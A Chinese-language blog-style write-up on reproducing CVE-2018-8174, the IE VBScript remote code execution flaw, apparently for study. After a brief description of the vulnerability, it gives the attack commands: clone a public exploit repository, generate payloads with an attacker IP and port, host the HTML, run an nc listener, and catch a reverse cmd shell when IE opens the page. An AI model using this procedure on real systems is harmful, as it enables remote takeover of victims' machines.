CVE-2018-8174 IE瀏覽器遠端程式碼執行漏洞
0x00漏洞簡介
在2018年5月9日的時候360發表了一份apt攻擊分析及溯源報告 文中提到了cve-2018-8174這個漏洞的首次在apt方面的應用
原文地址:http://www.4hou.com/vulnerable/11441.html
CVE2018-8174這個漏洞是針對ie瀏覽器的一個遠端程式碼執行漏洞
CVE地址:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174
這個漏洞的影響範圍為
A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
基本上影響了所有的高版本windows
漏洞細節已經有很多大佬已經寫出來了 此處不過多描述了
比如https://www.freebuf.com/vuls/172983.html
0x01復現過程
首先到github上面找exp
https://github.com/Sch01ar/CVE-2018-8174_EXP
然後克隆到本地
git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
然後生成payload
python CVE-2018-8174.py -u payload的url -o rtf檔案的名字 -i ip地址 -p 埠
然後就能看到生成了兩個檔案一個html一個rtf檔案
然後把這個html扔到nginx的網站目錄下
然後啟動nc監聽剛才設定的埠
然後開啟ie瀏覽器訪問一下這個html
然後ie瀏覽器並不會正常顯示這個頁面 但是攻擊已經成功了
此時我們去看看我們的nc已經成功的拿到了反彈回來的cmd了